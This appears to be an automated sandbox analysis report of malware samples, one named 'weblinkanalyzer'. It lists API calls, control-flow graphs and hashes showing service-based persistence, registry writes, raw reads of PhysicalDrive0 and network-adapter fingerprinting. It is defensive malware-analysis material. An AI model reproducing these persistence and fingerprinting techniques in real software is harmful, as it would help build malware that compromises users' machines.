                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9015EB0908304AFD710AF24D48525EBFE8EB48355F50C83EE58997281C7B895859B8A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                                                                  • Opcode ID: 96058ded24dfe7affaf00118df6cbde5af697d763978f14ba464de8c35491712
                                                                                                                                                                                                                                  • Instruction ID: 8f4e6c7c9ceedfa20c72349621b66b9a182318fedd968a48d18be14dbb0e03f5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96058ded24dfe7affaf00118df6cbde5af697d763978f14ba464de8c35491712
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC1116B19083009FD750EF69D94839EFBF4FB88315F41886EE58897260D7789985CF46
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                  • String ID: !
                                                                                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                  • Opcode ID: ae62e435266e3004bc25908d5d2ad0cb5826a6fc8d1708ba3a371f46b01cab50
                                                                                                                                                                                                                                  • Instruction ID: a790f44bbcbfc51444ab4f93a78f6104840dc0be6af6187218351783eeece817
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae62e435266e3004bc25908d5d2ad0cb5826a6fc8d1708ba3a371f46b01cab50
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 044140B18083109FD715AF6AC84839EFBF4AF84344F41C4AEE488A32A1D7788981CF56
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindowVisible.USER32 ref: 00406F16
                                                                                                                                                                                                                                  • CallWindowProcA.USER32 ref: 00406FB8
                                                                                                                                                                                                                                    • Part of subcall function 00404BD7: SendMessageA.USER32 ref: 00404C00
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID: $62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
• API String ID: 3748168415-550765199
• Opcode ID: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
• Instruction ID: 9710050d3cc87503a6e3ad62db4a5623da0bea7fc0aec59e94b28eb5e14ff036
• Opcode Fuzzy Hash: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
• Instruction Fuzzy Hash: 7F212CB0908315AFE710AF15E88496FBBF8EF44718F51883EF895A7281C3795851CB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: MessageSend$TextWindow
• String ID:
• API String ID: 1596935084-0
• Opcode ID: 2d215b4a7c55684c2c01937122f4af6b3fafd761fe9b14146eef76cc387a2035
• Instruction ID: 83727bad7781ca9a6187a820c8695953688329d0e622d1880d2d702268a23253
• Opcode Fuzzy Hash: 2d215b4a7c55684c2c01937122f4af6b3fafd761fe9b14146eef76cc387a2035
• Instruction Fuzzy Hash: EF311CB1D08214AFD710AF69C84466FBBF4EF44714F00C42EE884AB380D779A8458B96
Uniqueness

Uniqueness Score: -1.00%

APIs
• CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
• CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
• CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
• CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID:
• API String ID: 589700163-0
• Opcode ID: 128b1f827d319e1f67624c76284cc49d88a0dabf465fa48954d28b908fb3de1d
• Instruction ID: 94f009cbb2cc83b7245da44e9dca2fd274f464f9a0f55bd6391dd9b653ffba1a
• Opcode Fuzzy Hash: 128b1f827d319e1f67624c76284cc49d88a0dabf465fa48954d28b908fb3de1d
• Instruction Fuzzy Hash: 492194B1C082406FEB217F28988067ABFE49F85720F49847EE4849B251D3786C45CB6B
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 5.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4%
Total number of Nodes: 474
Total number of Limit Nodes: 11
execution_graph: node and edge data of the interactive execution-graph viewer (not rendered as text)
3580->3584 3581->3584 3582 4048b6 3583 4048a6 ExitProcess 3584->3582 3584->3583 3716 402721 3717 403010 12 API calls 3716->3717 3718 402726 3717->3718 3698 4028a4 3699 40d2c8 CreateServiceA 3698->3699 3216 40d62b RegCreateKeyExA 3778 4025ad 3779 4025b2 3778->3779 3780 40d253 GetTickCount 3779->3780 3642 402a32 3643 402a37 3642->3643 3644 40db2e GetCommandLineW 3643->3644 3781 4023b3 RegisterServiceCtrlHandlerA 3782 4023d6 3781->3782 3783 4024cc 3781->3783 3784 4023e4 SetServiceStatus GetLastError CreateEventA 3782->3784 3785 40245d SetServiceStatus CreateThread WaitForSingleObject CloseHandle 3784->3785 3786 40243e GetLastError 3784->3786 3787 4024c3 SetServiceStatus 3785->3787 3786->3787 3787->3783 3645 405c36 3646 405c59 3645->3646 3648 405c4d 3645->3648 3647 40697a 6 API calls 3646->3647 3647->3648 3788 40d1b6 3789 4021a2 3788->3789 3790 402a02 3788->3790 3789->3790 3791 40d6ea GetLastError 3789->3791 3792 40d953 LoadLibraryExA 3791->3792 3793 40d96a 3792->3793 3793->3793 3794 4025ba 3795 40d268 GetModuleFileNameA 3794->3795 3649 40283e 3652 401f64 FindResourceA 3649->3652 3651 402843 3653 401f86 GetLastError SizeofResource 3652->3653 3654 401f9f 3652->3654 3653->3654 3655 401fa6 LoadResource LockResource GlobalAlloc 3653->3655 3654->3651 3656 401fd2 3655->3656 3657 401ffb GetTickCount 3656->3657 3659 402005 GlobalAlloc 3657->3659 3659->3654

Control-flow Graph

APIs
• LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
• GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
• GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
• FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
Strings
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: Library$AdaptersAddressFreeInfoLoadProc
• String ID: GetAdaptersInfo$iphlpapi.dll$o
• API String ID: 514930453-3667123677
• Opcode ID: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
• Instruction ID: 696171d77ced3da8e64ebdc8d7a45064a9ae827dbc58ea61f09f05304c00b930
• Opcode Fuzzy Hash: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
• Instruction Fuzzy Hash: 6421D870940209AEDF219FA5CD447EF7BB8EF41304F0440BAD604B22E1E7789985CB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 26 401a4f-401a77 CreateFileA 27 401b45-401b4a 26->27 28 401a7d-401a91 26->28 29 401a98-401ac0 DeviceIoControl 28->29 30 401ac2-401aca 29->30 31 401af3-401afb 29->31 34 401ad4-401ad9 30->34 35 401acc-401ad2 30->35 32 401b04-401b07 31->32 33 401afd-401b03 call 402e56 31->33 37 401b09-401b0c 32->37 38 401b3a-401b44 FindCloseChangeNotification 32->38 33->32 34->31 39 401adb-401af1 call 402e70 call 4018cc 34->39 35->31 41 401b27-401b34 call 402e48 37->41 42 401b0e-401b17 GetLastError 37->42 38->27 39->31 41->29 41->38 42->38 44 401b19-401b1c 42->44 44->41 47 401b1e-401b24 44->47 47->41
APIs
• CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
• DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
• GetLastError.KERNEL32 ref: 00401B0E
• FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
• String ID: \\.\PhysicalDrive0
• API String ID: 3786717961-1180397377
• Opcode ID: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
• Instruction ID: 8e9e512524d6225b66ba562a13c5a7f417e6abf84bb9e2e9af9964b6e94f018c
• Opcode Fuzzy Hash: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
• Instruction Fuzzy Hash: CE318B71D01218EACB21EFA5CD849EFBBB8FF41750F20407AE514B22A0E7785E45CB98
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 121 40d234-40dc65 StartServiceCtrlDispatcherA
APIs
• StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040DC5F
Memory Dump Source
• Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: CtrlDispatcherServiceStart
• String ID:
• API String ID: 3789849863-0
• Opcode ID: c2b48e0d8a73da76ff28293d5386a6e7124266010e4d4754cd03fed75192db18
• Instruction ID: 707de1fed31c9c9cc4664e0c652b34d30681ff1bd6120e3740f17fb32104e870
• Opcode Fuzzy Hash: c2b48e0d8a73da76ff28293d5386a6e7124266010e4d4754cd03fed75192db18
• Instruction Fuzzy Hash: 42D05B20408100C6C21417E555550783765DD55330B11CF7690FE714E28A7904CBA61E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 135 4026e9-40d658 138 40d7f5-40dc65 StartServiceCtrlDispatcherA 135->138
APIs
• StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040DC5F
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: CtrlDispatcherServiceStart
• String ID:
• API String ID: 3789849863-0
• Opcode ID: f6408e35fdbdf074894251c043a57c3d778391015692f28ec9e624f0e741d252
• Instruction ID: 789ae47976887c049220f5e5451efe9368f5d3cf5dad1ab7781d5bfdbef77079
• Opcode Fuzzy Hash: f6408e35fdbdf074894251c043a57c3d778391015692f28ec9e624f0e741d252
• Instruction Fuzzy Hash: 06C0022090C411D6C6186BD0AB540716638E65A356F208ABAD45BB08E68F7D088EF62E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetVersion.KERNEL32 ref: 00403138
  • Part of subcall function 0040344A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
  • Part of subcall function 0040344A: HeapDestroy.KERNEL32 ref: 0040349A
• GetCommandLineA.KERNEL32 ref: 00403186
• GetStartupInfoA.KERNEL32(?), ref: 004031B1
• GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004031D4
  • Part of subcall function 0040322D: ExitProcess.KERNEL32 ref: 0040324A
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
• String ID:
• API String ID: 2057626494-0
• Opcode ID: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
• Instruction ID: 617ad2e6012ff9c1e059bad989762b11f9743b1554ab2ac8c32517e064b37c31
• Opcode Fuzzy Hash: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2217CB1940615AADB04EFB6DE46A6E7BB8EB45714F10413EF605BB2D1DB384900CBAC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 79 40481f-404829 80 40482b-404836 GetCurrentProcess TerminateProcess 79->80 81 40483c-404852 79->81 80->81 82 404890-4048a4 call 4048b8 81->82 83 404854-40485b 81->83 91 4048b6-4048b7 82->91 92 4048a6-4048b0 ExitProcess 82->92 85 40485d-404869 83->85 86 40487f-40488f call 4048b8 83->86 88 40486b-40486f 85->88 89 40487e 85->89 86->82 93 404871 88->93 94 404873-40487c 88->94 89->86 93->94 94->88 94->89
APIs
• GetCurrentProcess.KERNEL32(?,?,0040480A,?,00000000,00000000,004031E9,00000000,00000000), ref: 0040482F
• TerminateProcess.KERNEL32(00000000,?,0040480A,?,00000000,00000000,004031E9,00000000,00000000), ref: 00404836
• ExitProcess.KERNEL32 ref: 004048B0
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 630267537cb5ef8da9b38097f7ca418cdd556ea181d23c372b87813625bdceb0
• Instruction ID: 144ee4ae690132be24d3b7439d4fde7c7cee5440a8ed28615e41e0a9dc7ff649
• Opcode Fuzzy Hash: 630267537cb5ef8da9b38097f7ca418cdd556ea181d23c372b87813625bdceb0
• Instruction Fuzzy Hash: D601DB77640350DEEA10BF55FE85A1677A4FBC5750B10893FE540721E2C734AC41CA6D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 96 40344a-403468 HeapCreate 97 4034a0-4034a2 96->97 98 40346a-403477 call 403302 96->98 101 403486-403489 98->101 102 403479-403484 call 4034a7 98->102 104 4034a3-4034a6 101->104 105 40348b call 403cf8 101->105 108 403490-403492 102->108 105->108 108->104 109 403494-40349a HeapDestroy 108->109 109->97
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
  • Part of subcall function 00403302: GetVersionExA.KERNEL32 ref: 00403321
• HeapDestroy.KERNEL32 ref: 0040349A
  • Part of subcall function 004034A7: HeapAlloc.KERNEL32(00000000,00000140,00403483,000003F8), ref: 004034B4
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
• Opcode ID: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
• Instruction ID: e60f5d10070dd6772d4a54549668055c4e54cd76725331d0105a0707e5516faa
• Opcode Fuzzy Hash: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
• Instruction Fuzzy Hash: 58F0657461430299EB215F719E4772A2E98DB54797F10453BF406FC1D0EB7C86819909
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 110 40218d-40dc54 RegSetValueExA RegCloseKey
APIs
• RegSetValueExA.KERNELBASE(?,?,?,00000004), ref: 0040D70D
• RegCloseKey.KERNELBASE(?,?,00000004), ref: 0040DC54
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: CloseValue
• String ID:
• API String ID: 3132538880-0
• Opcode ID: f305e60dbf8ce0efdbe8a408dc5de8e7ef3a4bfc8f4f8aeed2f7e4a018db2ef4
• Instruction ID: 6dcc4c43cecca713c479bc083516d2f00d0eb767f36aa46da61f939dff5b1dac
• Opcode Fuzzy Hash: f305e60dbf8ce0efdbe8a408dc5de8e7ef3a4bfc8f4f8aeed2f7e4a018db2ef4
• Instruction Fuzzy Hash: 66D09E70808005EFCF8567908E48AA97A786B04345F110076E243764D48BB5099AAA1E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 115 40d869-40dcc7 CommandLineToArgvW GetLocalTime call 401f27 120 40dccc 115->120 120->120
APIs
• CommandLineToArgvW.SHELL32 ref: 0040D869
• GetLocalTime.KERNEL32(0040C2C0), ref: 0040DA36
Memory Dump Source
• Source File: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: ArgvCommandLineLocalTime
• String ID:
• API String ID: 561774760-0
• Opcode ID: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
• Instruction ID: c9dd54a2f6a0a9ef6b395da460124d2a44ef0955a0893859fe936c8b588cfaf7
• Opcode Fuzzy Hash: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
• Instruction Fuzzy Hash: 70D0C935C08102EBC2106BE59A4906876A1AB59355721053BE183F26E0DF78444AEA2E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 127 402981-402989 RegOpenKeyExA 128 4029be 127->128 129 40d0d4-40d8a4 128->129 130 4029c4-4029c7 128->130 130->129 131 40d5c4-40d976 130->131
APIs
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: df93da2a25ddf449426f018fbad1f35667b762f243256c4c25e54ae034fa883e
• Instruction ID: 7df17e09f2432b10eb6c2be66ef450d18aff74beed7de32105507e4b1735c4b5
• Opcode Fuzzy Hash: df93da2a25ddf449426f018fbad1f35667b762f243256c4c25e54ae034fa883e
• Instruction Fuzzy Hash: 7DD09E74D1801AEBD705CAA08E08AFA72A87B04304F5049379557B21C0D7B8D50E575A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 140 40226a-402272 RegQueryValueExA 141 40d0ce 140->141 142 40d8a4 141->142 143 40d0d4-40d0d6 141->143 143->142
APIs
• RegQueryValueExA.KERNELBASE ref: 0040226A
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 43a4795149afaa95ff49d7760f145aa27886ccc34a94ac535b3cf4f5122f40dc
• Instruction ID: cd8f19b0e75b23b67f056bc5011eb5fb97471f13f622c60d442dd2a780a17e7d
• Opcode Fuzzy Hash: 43a4795149afaa95ff49d7760f145aa27886ccc34a94ac535b3cf4f5122f40dc
• Instruction Fuzzy Hash: C7B09230E18102FADB255FB89F0C62A29647F447847364D36A857F10E0D6BD8A0AB51E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 145 402a7c-40dc37 CreateDirectoryA
APIs
• CreateDirectoryA.KERNELBASE ref: 0040DC31
Memory Dump Source
• Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
Similarity
• API ID: CreateDirectory
• String ID:
• API String ID: 4241100979-0
• Opcode ID: 2e1d1612e622339b26055c081b462bb1b5f10dc22293ef15fd6cbdadef8c59f8
